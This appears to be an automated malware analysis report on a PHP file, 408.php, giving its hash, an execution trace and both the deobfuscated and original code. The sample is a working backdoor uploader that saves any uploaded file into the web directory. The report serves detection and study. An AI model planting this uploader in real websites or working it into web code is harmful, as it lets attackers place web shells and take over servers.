PHP Malware Analysis

408.php

md5: 47f6a7bb0f786148bf2b7d6320d735ae

Jump to:

Screenshot


Attributes

Files

Input


Deobfuscated PHP code

<form method="post" enctype="multipart/form-data">
  <input type="file" name="uk45">
  <button>Gaskan</button>
</form>
<?php 
if (isset($_FILES['uk45'])) {
    file_put_contents($_FILES['uk45']['name'], file_get_contents($_FILES['uk45']['tmp_name']));
    if (file_exists("./" . $_FILES['uk45']['name'])) {
        echo "Oke !";
    } else {
        echo "Fail !";
    }
}

Execution traces

data/traces/47f6a7bb0f786148bf2b7d6320d735ae_trace-1676246959.7001.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:09:45.597968]
1	0	1	0.000249	393512
1	3	0	0.000320	396040	{main}	1		/var/www/html/uploads/408.php	0	0
1	3	1	0.000339	396040
			0.000375	314224
TRACE END   [2023-02-12 22:09:45.598140]


Generated HTML code

<html><head></head><body><form method="post" enctype="multipart/form-data">
  <input type="file" name="uk45">
  <button>Gaskan</button>
</form>
</body></html>

Original PHP code

<form method="post" enctype="multipart/form-data">
  <input type="file" name="uk45">
  <button>Gaskan</button>
</form>
<?php
if (isset($_FILES['uk45'])) {
  file_put_contents($_FILES['uk45']['name'], file_get_contents($_FILES['uk45']['tmp_name']));
  if (file_exists("./".$_FILES['uk45']['name'])) {
    echo "Oke !";
  } else {
    echo "Fail !";
  }
}
?>